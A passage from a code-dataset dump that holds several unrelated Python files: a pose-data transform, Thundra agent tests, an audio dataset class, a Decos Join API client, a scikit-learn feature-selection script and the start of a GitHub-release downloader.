float]] = None,\n cr_margin_B: Union[float, Tuple[float, float]] = None,\n re_size_A: Union[int, Tuple[int, int]] = None,\n re_size_B: Union[int, Tuple[int, int]] = None,\n ):\n self.i2t = ImageToTensor()\n self.m2t = MaskToTensor()\n\n self.views = [\"A\", \"B\"]\n self.crop = {\n \"A\": None,\n \"B\": None,\n }\n if cr_margin_A is not None:\n self.crop[\"A\"] = DynamicSquareCrop(margin=cr_margin_A)\n if cr_margin_B is not None:\n self.crop[\"B\"] = DynamicSquareCrop(margin=cr_margin_B)\n\n self.resize = {\n \"A\": None,\n \"B\": None,\n }\n if re_size_A is not None:\n self.resize[\"A\"] = Resize(size=re_size_A)\n if re_size_B is not None:\n self.resize[\"B\"] = Resize(size=re_size_B)\n\n def __call__(self, input: dict) -> dict:\n for v in self.views:\n p = input[v][\"pose_2d\"]\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[v][\"pose_2d\"] = {\n \"p\": p,\n \"c\": c,\n }\n\n p = input[\"W\"][\"pose_3d\"]\n p = world_to_camera(\n xyz=p,\n R=input[v][\"R\"][None, :, :],\n t=input[v][\"t\"][None, :, :],\n )\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[v][\"pose_3d\"] = {\n \"root\": {\n \"p\": p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n \"relative\": {\n \"p\": p - p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c & c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n }\n\n x_off, y_off = 0.0, 0.0\n if self.crop[v]:\n p, c = input[v][\"pose_2d\"][\"p\"], input[v][\"pose_2d\"][\"c\"]\n points = p[c.expand_as(p)].reshape(-1, 2, 1)\n points = points if len(points) > 0 else p\n (m, _), (M, _) = points.min(dim=-3), points.max(dim=-3)\n x_m, y_m = m.squeeze(dim=-1).tolist()\n x_M, y_M = M.squeeze(dim=-1).tolist()\n input[v][\"image\"], (x_off, y_off) = self.crop[v](\n image=input[v][\"image\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[v][\"mask\"], (_, _) = self.crop[v](\n image=input[v][\"mask\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[v][\"K\"] = input[v][\"K\"] - torch.tensor(\n [\n [0.0, 0.0, x_off],\n [0.0, 0.0, y_off],\n [0.0, 0.0, 0.0],\n ]\n )\n # input[v][\"pose_2d\"][\"p\"] = input[v][\"pose_2d\"][\"p\"] - torch.tensor([[x_off], [y_off]])\n input[v][\"crop_offset\"] = torch.tensor([x_off, y_off])\n input[v][\"cropped_resolution\"] = torch.tensor(input[v][\"image\"].size)\n\n if self.resize[v]:\n input[v][\"image\"], (w_r, h_r) = self.resize[v](image=input[v][\"image\"])\n input[v][\"mask\"], (_, _) = self.resize[v](image=input[v][\"mask\"])\n input[v][\"K\"] = input[v][\"K\"] * torch.tensor(\n [\n [w_r, 1.0, w_r],\n [1.0, h_r, h_r],\n [1.0, 1.0, 1.0],\n ]\n )\n # input[v][\"pose_2d\"][\"p\"] = input[v][\"pose_2d\"][\"p\"] * torch.tensor([[w_r], [h_r]])\n input[v][\"resized_resolution\"] = torch.tensor(input[v][\"image\"].size)\n\n input[v][\"stabilized_padding\"] = stabilized_padding(\n crop_offset=input[v][\"crop_offset\"],\n original_resolution=input[v][\"resolution\"],\n cropped_resolution=input[v][\"cropped_resolution\"],\n resized_resolution=input[v][\"resized_resolution\"],\n )\n\n input[v][\"image\"] = self.i2t(input[v][\"image\"])\n input[v][\"mask\"] = self.m2t(input[v][\"mask\"])\n # input[v][\"masked_image\"] = input[v][\"mask\"] * input[v][\"image\"]\n input[v][\"masked_image\"] = (\n input[v][\"mask\"] * input[v][\"image\"]\n + ~input[v][\"mask\"] * MEDIAN_PIXEL[..., None, None]\n )\n\n return input\n","repo_name":"GuillaumeRochette/HumanViewSynthesis","sub_path":"data/Human36M/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"25754184629","text":"import mock\nimport pytest\n\nfrom thundra.config import config_names\nfrom thundra.config.config_provider import ConfigProvider\nfrom thundra.context.execution_context_manager import ExecutionContextManager\nfrom thundra.plugins.trace.trace_plugin import TracePlugin\nfrom thundra.thundra_agent import Thundra\n\n\ndef test_if_api_key_is_retrieved_from_env_var():\n ConfigProvider.set(config_names.THUNDRA_APIKEY, 'api key')\n thundra = Thundra()\n assert thundra.api_key == 'api key'\n\n\ndef test_if_disable_trace_is_set_to_true():\n thundra = Thundra('api key', disable_trace=True)\n\n for plugin in thundra.plugins:\n assert not type(plugin) is TracePlugin\n\n\ndef test_if_disable_trace_is_set_to_false():\n thundra = Thundra('api key', disable_trace=False)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_if_disable_trace_is_not_set():\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_disable_trace_plugin_from_environment_variable():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is False\n\n\ndef test_enable_trace_plugin_from_environment_variable():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'false')\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_if_disable_trace_plugin_from_environment_variable_is_prior():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n thundra = Thundra('api key', disable_trace=False)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is False\n\n\ndef test_if_enable_trace_plugin_from_environment_variable_is_prior():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'false')\n thundra = Thundra('api key', disable_trace=True)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\n@mock.patch('thundra.reporter.Reporter')\ndef test_if_thundra_is_disabled(mock_reporter, handler, mock_event, mock_context):\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n _, handler = handler\n\n handler(mock_event, mock_context)\n\n assert not mock_reporter.add_report.called\n assert not mock_reporter.send_reports.called\n\n\ndef test_if_exception_is_handled(handler_with_exception, mock_context, mock_event):\n thundra, handler = handler_with_exception\n with pytest.raises(Exception):\n handler(mock_event, mock_context)\n\n assert ExecutionContextManager.get().error\n\n\n@mock.patch('thundra.thundra_agent.Thundra.check_and_handle_warmup_request')\ndef test_if_thundra_crashes_user_handler_before(mocked_func, handler, mock_event, mock_context):\n mocked_func.side_effect = RuntimeError('Boom!')\n thundra, handler = handler\n try:\n handler(mock_event, mock_context)\n except Exception:\n pytest.fail(\"User's handler shouldn't fail when Thundra raise an exception\")\n\n\n@mock.patch('thundra.reporter.Reporter.send_reports')\ndef test_if_thundra_crashes_user_handler_after(mocked_func, handler, mock_event, mock_context):\n mocked_func.side_effect = RuntimeError('Boom!')\n thundra, handler = handler\n try:\n handler(mock_event, mock_context)\n except Exception:\n pytest.fail(\"User's handler shouldn't fail when Thundra raise an exception\")\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"tests/test_thundra_agent.py","file_name":"test_thundra_agent.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"32826732716","text":"import torch\nfrom torch.utils.data import Dataset\nfrom torchaudio import load, transforms\nimport glob\nimport os\n\n\nclass AudioDataset(Dataset):\n def __init__(\n self,\n path,\n sample_rate=22050,\n n_fft=2048,\n n_mels=128,\n win_length=1024,\n hop_length=1024,\n log_mel=True,\n augment=False\n ):\n \"\"\"\n A custom dataset class to load audio snippets and create\n mel spectrograms.\n\n Args:\n path (string): path to folder with audio files\n sample_rate (integer): sample rate of audio signal\n n_fft (integer): number of Fourier transforms to use for the mel spectrogram\n n_mels (integer): number of mel bins to use for the mel spectrogram\n log_mel (boolean): whether to use log-mel spectrograms instead of db-scaled\n \"\"\"\n self.path = path\n self.sr = sample_rate\n self.n_fft = n_fft\n self.n_mels = n_mels\n self.win_length = win_length\n self.hop_length = hop_length\n self.log_mel = log_mel\n self.augment = augment\n self.file_paths = glob.glob(os.path.join(self.path, \"**\", f\"*wav\"), recursive=True)\n self.labels = [x.split(\"/\")[-2] for x in self.file_paths]\n self.mapping = {\"ads_other\": 0, \"music\": 1}\n for i, label in enumerate(self.labels):\n self.labels[i] = self.mapping[label]\n\n def __len__(self):\n return len(self.file_paths)\n\n def __getitem__(self, index):\n audio, sr = load(self.file_paths[index])\n audio = torch.mean(audio, dim=0, keepdim=True)\n if self.sr != sr:\n audio = transforms.Resample(sr, self.sr)(audio)\n mel_spectrogram = transforms.MelSpectrogram(\n sample_rate=self.sr,\n n_fft=self.n_fft,\n win_length=self.win_length,\n hop_length=self.hop_length,\n n_mels=self.n_mels,\n f_max=self.sr / 2\n )(audio)\n if self.log_mel:\n offset = 1e-6\n mel_spectrogram = torch.log(mel_spectrogram + offset)\n else:\n mel_spectrogram = transforms.AmplitudeToDB(stype=\"power\", top_db=80)(mel_spectrogram)\n if self.augment:\n audio = transforms.FrequencyMasking(freq_mask_param=20)(audio)\n audio = transforms.TimeMasking(time_mask_param=10)(audio)\n label = self.labels[index]\n return mel_spectrogram, label\n","repo_name":"rvdmaazen/Radio-Audio-Classification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40956332261","text":"import concurrent.futures\nimport logging\nimport math\n\nimport requests\nfrom requests import PreparedRequest\nfrom requests.auth import HTTPBasicAuth\n\nfrom app.auth import PROFILE_TYPE_COMMERCIAL, PROFILE_TYPE_PRIVATE\nfrom app.config import (\n DECOS_API_REQUEST_TIMEOUT,\n get_decosjoin_adres_boeken_bsn,\n get_decosjoin_adres_boeken_kvk,\n)\nfrom app.crypto import encrypt\nfrom app.field_parsers import (\n get_fields,\n to_date,\n to_int,\n to_string,\n to_string_or_empty_string,\n)\nfrom app.zaaktypes import zaken_index\n\nPAGE_SIZE = 60\n\nSELECT_FIELDS = \",\".join(\n [\n \"title\",\n \"mark\",\n \"text45\",\n \"subject1\",\n \"bol7\",\n \"bol8\",\n \"bol9\",\n \"bol10\",\n \"bol11\",\n \"bol12\",\n \"bol13\",\n \"bol16\",\n \"bol17\",\n \"bol18\",\n \"bol20\",\n \"bol21\",\n \"bol22\",\n \"bol23\",\n \"company\",\n \"date1\",\n \"date2\",\n \"date5\",\n \"date6\",\n \"date7\",\n \"date8\",\n \"dfunction\",\n \"document_date\",\n \"num3\",\n \"num6\",\n \"num14\",\n \"num15\",\n \"text5\",\n \"text6\",\n \"text7\",\n \"text8\",\n \"text9\",\n \"text10\",\n \"text11\",\n \"text12\",\n \"text13\",\n \"text14\",\n \"text15\",\n \"text17\",\n \"text18\",\n \"text19\",\n \"text20\",\n \"text21\",\n \"text22\",\n \"text25\",\n \"text39\",\n \"text49\",\n \"processed\",\n \"sequence\",\n ]\n)\n\n\ndef get_decosjoin_adres_boeken():\n return {\n PROFILE_TYPE_PRIVATE: get_decosjoin_adres_boeken_bsn(),\n PROFILE_TYPE_COMMERCIAL: get_decosjoin_adres_boeken_kvk(),\n }\n\n\nclass DecosJoinConnection:\n def __init__(self, username, password, api_host, adres_boeken=None):\n self.username = username\n self.password = password\n self.adres_boeken = (\n adres_boeken if adres_boeken else get_decosjoin_adres_boeken()\n )\n self.api_host = api_host\n self.api_location = \"/decosweb/aspx/api/v1/\"\n self.api_url = f\"{self.api_host}{self.api_location}\"\n\n def get_response(self, *args, **kwargs):\n \"\"\"Easy to mock intermediate function.\"\"\"\n return requests.get(*args, **kwargs)\n\n def post_response(self, *args, **kwargs):\n \"\"\"Easy to mock intermediate function.\"\"\"\n return requests.post(*args, **kwargs)\n\n def request(self, url, method=\"get\", json=None):\n \"\"\"Makes a request to the decos join api with HTTP basic auth credentials added.\"\"\"\n if method == \"get\":\n response = self.get_response(\n url,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/itemdata\"},\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n elif method == \"post\":\n response = self.post_response(\n url,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/itemdata\"},\n json=json,\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n else:\n raise RuntimeError(\"Method needs to be GET or POST\")\n\n if response.status_code == 200:\n json = response.json()\n return json\n else:\n response.raise_for_status()\n\n def get_search_query_json(self, bsn: str, book_key: str):\n return {\n \"bookKey\": book_key,\n \"orderBy\": \"sequence\",\n \"skip\": 0,\n \"take\": 50,\n \"searchInHierarchyPath\": False,\n \"searchInPendingItemContainerKeys\": False,\n \"filterFields\": {\n \"num1\": [\n {\"FilterOperation\": 1, \"FilterValue\": bsn, \"FilterOperator\": \"=\"}\n ]\n },\n }\n\n def get_user_keys(self, profile_type, user_identifier):\n \"\"\"Retrieve the internal ids used for a user.\"\"\"\n keys = []\n\n adres_boeken = self.adres_boeken[profile_type]\n\n def get_key(boek):\n keys = []\n url = f\"{self.api_url}search/books?properties=false\"\n\n res_json = self.request(\n url,\n json=self.get_search_query_json(user_identifier, boek),\n method=\"post\",\n )\n\n if res_json[\"itemDataResultSet\"][\"count\"] > 0:\n for item in res_json[\"itemDataResultSet\"][\"content\"]:\n user_key = item[\"key\"]\n keys.append(user_key)\n\n return keys\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n get_key, adres_boeken, timeout=DECOS_API_REQUEST_TIMEOUT\n )\n\n for result in results:\n keys.extend(result)\n\n return keys\n\n @staticmethod\n def is_list_match(zaak, key, test_list) -> bool:\n value = zaak[key] if key in zaak else None\n if value is None:\n return False\n value = value.lower()\n return value in test_list\n\n def transform(self, zaken_source, user_identifier): # noqa: C901\n new_zaken = []\n deferred_zaken = []\n\n for zaak_source in zaken_source:\n source_fields = zaak_source[\"fields\"]\n\n # Cannot reliably determine the zaaktype of this zaak\n if \"text45\" not in source_fields:\n continue\n\n source_fields.update({\"id\": zaak_source[\"key\"]})\n\n zaak_type = source_fields[\"text45\"]\n\n # Zaak is defined\n if zaak_type not in zaken_index:\n continue\n\n Zaak = zaken_index[zaak_type]\n new_zaak = Zaak(source_fields).result()\n\n if new_zaak is None:\n continue\n\n # These matching conditions are used to prevent these items from being included in the returned list of zaken\n if self.is_list_match(\n new_zaak,\n \"description\",\n [\"wacht op online betaling\", \"wacht op ideal betaling\"],\n ):\n continue\n\n if self.is_list_match(\n new_zaak,\n \"decision\",\n [\"buiten behandeling\", \"geannuleerd\", \"geen aanvraag of dubbel\"],\n ):\n continue\n\n if new_zaak[\"description\"] and new_zaak[\"description\"].lower().startswith(\n \"*verwijder\"\n ):\n continue\n\n # This url can be used to retrieve matching document attachments for this particular zaak\n new_zaak[\n \"documentsUrl\"\n ] = f\"/decosjoin/listdocuments/{encrypt(zaak_source['key'], user_identifier)}\"\n\n if Zaak.defer_transform:\n deferred_zaken.append([new_zaak, Zaak])\n else:\n new_zaken.append(new_zaak)\n\n deferred_zaken.sort(key=lambda x: x[0].get(\"caseType\"))\n\n # In parallel\n # Makes it possible to defer adding the zaak to the zaken response for example to:\n # - Adding dateWorkflowActive by querying other Api's\n def perform_deferred_transform(zaak_tuple):\n [deferred_zaak, Zaak_cls] = zaak_tuple\n return Zaak_cls.defer_transform(\n zaak_deferred=deferred_zaak,\n decosjoin_service=self,\n )\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n perform_deferred_transform,\n deferred_zaken,\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n\n for result in results:\n new_zaken.append(result)\n\n zaken_source_sorted = sorted(new_zaken, key=lambda zaak: zaak[\"identifier\"])\n\n return zaken_source_sorted\n\n def get_page(self, url, offset=None):\n \"\"\"Get a single page for url. When offset is provided add that to the url.\"\"\"\n if offset:\n url += f\"&skip={offset}\"\n res_json = self.request(url)\n logging.debug(f\"Get page {url} - offset: {offset}\")\n logging.debug(res_json)\n return res_json\n\n def get_all_pages(self, url):\n \"\"\"Get 'content' from all pages for the provided url\"\"\"\n\n req = PreparedRequest()\n req.prepare_url(url, {\"top\": PAGE_SIZE}) # append top get param\n url = req.url\n\n items = []\n # fetch one page to get the first part of the data and item count\n res = self.get_page(url)\n\n end = math.ceil(res[\"count\"] / PAGE_SIZE) * PAGE_SIZE\n items.extend(res[\"content\"])\n\n for offset in range(PAGE_SIZE, end, PAGE_SIZE):\n res = self.get_page(url, offset)\n items.extend(res[\"content\"])\n\n return items\n\n def get_zaken(self, profile_type, user_identifier):\n zaken_source = []\n user_keys = self.get_user_keys(profile_type, user_identifier)\n\n def fetch_zaken(key):\n url = f\"{self.api_url}items/{key}/folders?select={SELECT_FIELDS}\"\n zaken = self.get_all_pages(url)\n return zaken\n\n # execute in parallel\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n fetch_zaken, user_keys, timeout=DECOS_API_REQUEST_TIMEOUT\n )\n\n for result in results:\n zaken_source.extend(result)\n\n zaken = self.transform(zaken_source, user_identifier)\n return zaken\n\n def get_document_data(self, document_id: str):\n res_json = self.request(f\"{self.api_url}items/{document_id}/blob?select=bol10\")\n\n content = res_json[\"content\"]\n if content:\n for i in content[::-1]:\n is_pdf = i[\"fields\"].get(\"bol10\", False)\n if is_pdf:\n return {\"is_pdf\": is_pdf, \"doc_key\": i[\"key\"]}\n return {\n \"is_pdf\": False,\n }\n\n def get_documents(self, zaak_id, identifier):\n url = f\"{self.api_url}items/{zaak_id}/documents?select=subject1,sequence,mark,text39,text40,text41,itemtype_key\"\n\n res = self.get_all_pages(url)\n\n parse_fields = [\n {\"name\": \"title\", \"from\": \"text41\", \"parser\": to_string_or_empty_string},\n {\"name\": \"id\", \"from\": \"mark\", \"parser\": to_string},\n {\"name\": \"sequence\", \"from\": \"sequence\", \"parser\": to_int},\n {\"name\": \"text39\", \"from\": \"text39\", \"parser\": to_string_or_empty_string},\n {\"name\": \"text40\", \"from\": \"text40\", \"parser\": to_string_or_empty_string},\n {\"name\": \"text41\", \"from\": \"text41\", \"parser\": to_string_or_empty_string},\n ]\n\n new_docs = []\n\n for item in res:\n document_source = item[\"fields\"]\n if document_source[\"itemtype_key\"].lower() == \"document\":\n document_meta_data = get_fields(parse_fields, document_source)\n\n if (\n document_meta_data[\"text39\"].lower() == \"definitief\"\n and document_meta_data[\"text40\"].lower()\n in [\"openbaar\", \"beperkt openbaar\"]\n and document_meta_data[\"text41\"].lower() != \"nvt\"\n ):\n doc_data = self.get_document_data(item[\"key\"])\n\n if doc_data[\"is_pdf\"]:\n document_meta_data[\n \"url\"\n ] = f\"/decosjoin/document/{encrypt(doc_data['doc_key'], identifier)}\"\n\n del document_meta_data[\"text39\"]\n del document_meta_data[\"text40\"]\n del document_meta_data[\"text41\"]\n\n new_docs.append(document_meta_data)\n\n new_docs.sort(key=lambda x: x[\"sequence\"])\n\n for doc in new_docs:\n del doc[\"sequence\"]\n\n return new_docs\n\n def get_document_blob(self, document_id):\n url_blob_content = f\"{self.api_url}items/{document_id}/content\"\n\n document_response = self.get_response(\n url_blob_content,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/octet-stream\"},\n )\n\n return {\n \"Content-Type\": document_response.headers[\"Content-Type\"],\n \"file_data\": document_response.content,\n }\n\n def get_workflow_date_by_step_title(self, zaak_id: str, step_title: str):\n all_workflows_response = self.request(\n f\"{self.api_url}items/{zaak_id}/workflows\"\n )\n\n if all_workflows_response and all_workflows_response[\"count\"] > 0:\n # Take last workflow key\n\n worflow_key = all_workflows_response[\"content\"][-1][\"key\"]\n single_workflow_url = f\"{self.api_url}items/{worflow_key}/workflowlinkinstances?properties=false&fetchParents=false&oDataQuery.select=mark,date1,date2,text7,sequence&oDataQuery.orderBy=sequence\"\n single_workflow_response = self.request(single_workflow_url)\n\n if not single_workflow_response[\"content\"]:\n return None\n\n workflow_step_date = None\n logging.debug(\n f\"Find workflow step for {zaak_id} by step title {step_title}\"\n )\n for workflow_step in single_workflow_response[\"content\"]:\n if (\n \"text7\" in workflow_step[\"fields\"]\n and workflow_step[\"fields\"][\"text7\"] == step_title\n ):\n logging.debug(workflow_step[\"fields\"])\n workflow_step_date = to_date(workflow_step[\"fields\"][\"date1\"])\n\n return workflow_step_date\n\n return None\n","repo_name":"Amsterdam/mijn-decos-join-api","sub_path":"app/decosjoin_service.py","file_name":"decosjoin_service.py","file_ext":"py","file_size_in_byte":13753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1178368925","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Construct a man-made data\ndf = pd.DataFrame(np.array([\n [1., 2., 3., 4.],\n [5., 6., np.nan, 8.],\n [10., 11., 12., np.nan]\n]), columns=list('ABCD'))\n\n# Imputation 插值\nfrom sklearn.preprocessing import Imputer\n\nimr = Imputer(missing_values='NaN', strategy='mean', axis=0)\nimr = imr.fit(df)\nimputed_data = imr.transform(df.values)\nimputed_data\n\ndf = pd.DataFrame([\n ['green', 'M', 10.1, 'class1'],\n ['red', 'L', 13.5, 'class2'],\n ['blue', 'XL', 15.3, 'class1']\n], columns=['color', 'size', 'price', 'classlabel'])\n\n# Convert ordinal feature to int number\nsize_mapping = {\n 'XL': 3,\n 'L': 2,\n \"M\": 1\n}\n\ninv_size_mapping = {v: k for k, v in size_mapping.items()}\n\ndf['size'] = df['size'].map(size_mapping)\n\nclass_mapping = {label: idx for idx,\n label in enumerate(np.unique(df['classlabel']))}\ninv_class_mapping = {v: k for k, v in class_mapping.items()}\n\ndf['classlabel'] = df['classlabel'].map(class_mapping)\n\nfrom sklearn.preprocessing import LabelEncoder\n\nclass_le = LabelEncoder()\ny = class_le.fit_transform(df['classlabel'].values)\n\ncolor_re = LabelEncoder()\ndf.ix[:, 0] = color_re.fit_transform(df.ix[:, 0].values)\n\n# One-hot encoding == pd.get_dummpy()\nfrom sklearn.preprocessing import OneHotEncoder\n\nohe = OneHotEncoder(categorical_features=[0], sparse=True)\nohe.fit_transform(df.values).toarray()\n\nfrom sklearn.datasets import load_wine\n\nwine_data = load_wine()\nwine_df = pd.DataFrame(wine_data['data'], columns=wine_data['feature_names'])\nwine_df['target'] = wine_data['target']\n\nfrom sklearn.model_selection import train_test_split\n\nX, y = wine_df.iloc[:, :-1].values, wine_df.iloc[:, -1].values\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=0)\n\n# Normalization\nfrom sklearn.preprocessing import MinMaxScaler\n\nmms = MinMaxScaler()\nX_train_norm = mms.fit_transform(X_train)\nX_test_norm = mms.fit_transform(X_test)\n\n# Standardization\nfrom sklearn.preprocessing import StandardScaler\n\nstdsc = StandardScaler()\nX_train_std = stdsc.fit_transform(X_train)\nX_test_std = stdsc.fit_transform(X_test)\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression(penalty='l1', C=0.1)\nlr.fit(X_train_std, y_train)\nprint(\"Training Accuracy:\", lr.score(X_train_std, y_train))\nprint(\"Test Accuracy:\", lr.score(X_test_std, y_test))\n\n# Plot Regularization Weights Variation\nfig = plt.figure()\nax = plt.subplot(111)\ncolors = ['blue', 'green', 'red', 'cyan', 'magenta',\n 'yellow', 'black', 'pink', 'lightgreen',\n 'lightblue', 'gray', 'indigo', 'orange']\nweights, params = [], []\nfor c in np.arange(-4.0, 6.0):\n lr = LogisticRegression(penalty='l1', C=10 ** c, random_state=0)\n lr.fit(X_train_std, y_train)\n weights.append(lr.coef_[1])\n params.append(10 ** c)\nweights = np.array(weights)\nfor col, color in zip(range(weights.shape[1]), colors):\n ax.plot(params, weights[:, col], label=wine_df.columns[col], color=color)\nplt.axhline(0, color='black', ls='--', lw=3)\nplt.xlim([10 ** (-5), 10 ** 5])\nplt.ylabel('weight coefficient')\nplt.xlabel('C')\nplt.xscale('log')\nax.legend(loc='upper center', bbox_to_anchor=(\n 1.38, 1.03), ncol=1, fancybox=True)\nplt.show()\n\n# Sequential Backward Selection\nfrom sklearn.base import clone\nfrom itertools import combinations\nfrom sklearn.metrics import accuracy_score\n\n\nclass SBS(object):\n def __init__(self, estimator, k_features, scoring=accuracy_score, test_size=0.25,\n random_state=1):\n self.scoring = scoring\n self.estimator = clone(estimator)\n self.k_features = k_features\n self.test_size = test_size\n self.random_state = random_state\n\n def fit(self, X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=self.test_size,\n random_state=self.random_state)\n dim = X_train.shape[1] # feature number\n self.indices_ = tuple(range(dim))\n self.subsets_ = [self.indices_]\n score = self._calc_score(\n X_train, y_train, X_test, y_test, self.indices_)\n self.scores_ = [score]\n\n while dim > self.k_features:\n scores = []\n subsets = []\n\n for p in combinations(self.indices_, r=dim - 1):\n score = self._calc_score(X_train, y_train, X_test, y_test, p)\n scores.append(score)\n subsets.append(p)\n\n best = np.argmax(scores)\n self.indices_ = subsets[best]\n self.subsets_.append(self.indices_)\n\n dim -= 1\n self.scores_.append(scores[best])\n\n self.k_score_ = self.scores_[-1]\n\n return self\n\n def transform(self, X):\n return X[:, self.indices_]\n\n def _calc_score(self, X_train, y_train, X_test, y_test, indices):\n self.estimator.fit(X_train[:, indices], y_train)\n y_pred = self.estimator.predict(X_test[:, indices])\n score = self.scoring(y_test, y_pred)\n return score\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = KNeighborsClassifier(n_neighbors=2)\nsbs = SBS(knn, k_features=1)\nsbs.fit(X_train_std, y_train)\nk_feat = [len(k) for k in sbs.subsets_]\nplt.plot(k_feat, sbs.scores_, marker='o')\nplt.ylim([0.7, 1.1])\nplt.ylabel('Accuracy')\nplt.xlabel('Number of features')\nplt.grid()\nplt.show()\n\n# Test the top five significant features\nk5 = list(sbs.subsets_[8]) # 8 = 13 - 5\nprint(wine_df.columns[k5])\n\nknn.fit(X_train_std, y_train)\nprint(\"Training Accuracy:\", knn.score(X_train_std, y_train))\nprint('Test Accuracy:', knn.score(X_test_std, y_test))\n\nknn.fit(X_train_std[:, k5], y_train)\nprint(\"Training Accuracy:\", knn.score(X_train_std[:, k5], y_train))\nprint('Test Accuracy:', knn.score(X_test_std[:, k5], y_test))\n\n# judge the feature importance by random forest\nfrom sklearn.ensemble import RandomForestClassifier\n\nfeat_labels = wine_df.columns[:-1]\nforest = RandomForestClassifier(n_estimators=10000, random_state=0, n_jobs=-1)\nforest.fit(X_train, y_train)\nimportances = forest.feature_importances_\nindicies = np.argsort(importances)[::-1]\nfor f in range(X_train.shape[1]):\n print('%2d) %-*s %f' %\n (f + 1, 30, feat_labels[f], importances[indicies[f]]))\n\nplt.title(\"Feature Importances\")\nplt.bar(range(X_train.shape[1]), importances[indicies],\n color='lightblue', align='center')\nplt.xticks(range(X_train.shape[1]), feat_labels, rotation=90)\nplt.tight_layout()\nplt.show()\n","repo_name":"FitzHoo/MachineLearning","sub_path":"SequentialBackwardSelection.py","file_name":"SequentialBackwardSelection.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32404927104","text":"import urllib.request\nfrom pathlib import Path\n\nimport typer\nfrom github import Github\n\n_github = Github()\n\n\nclass Releases:\n def __init__(self, repo: str):\n self.repo_name = repo\n self.repo = _github.get_repo(repo)\n self.releases = self.repo.get_releases()\n if self.releases.totalCount == 0:\n raise ValueError(\"No releases found\")\n\n def get_repo_name(self):\n return self.repo_name\n\n def get_project_name(self):\n return self.repo.name\n\n def get_project_description(self):\n return self.repo.description\n\n def get_latest_version(self):\n r = self.releases[0]\n ver = r.tag_name.replace(\"-\", \"_\")\n if ver.startswith(\"v\"):\n ver = ver[1:]\n return ver\n\n def get_publish_date(self):\n r = self.releases[0]\n return r.published_at.strftime(\"%Y-%m-%d\")\n \n def download_tarball(self, save_dir):\n assets = self.releases[0].assets\n asset_scoretable = []\n arch = [\"linux\", \"amd64\", \"x86_64\", \"x86-64\", \"x64\"]\n lib = [\"glibc\", \"gnu\"]\n extensions = [\"tar\", \"tgz\", \"gz\", \"zip\"]\n for asset in assets:\n score = 0\n s = asset.name.lower()\n for kw in arch:\n if kw in s:\n score += 100\n if any(f\".{ext}\" in s for ext in extensions):\n score += 10\n for kw in arch:\n if kw in s:\n score += 1 \n asset_scoretable.append((asset, score))\n asset_scoretable.sort(key=lambda x: x[1], reverse=True)\n\n if len(asset_scoretable) == 0:\n raise ValueError(\"No tarballs found\")\n\n print(f\"Found {len(asset_scoretable)} tarballs:\\n\")\n for i, (asset, score) in enumerate(asset_scoretable):\n print(f\"{i}. {asset.name}\")\n asset = asset_scoretable[typer.prompt(\"\\nSelect tarball to download\", type=int, default=0)][0]\n\n with typer.progressbar(label=\"Downloading\", length=asset.size) as progress:\n def 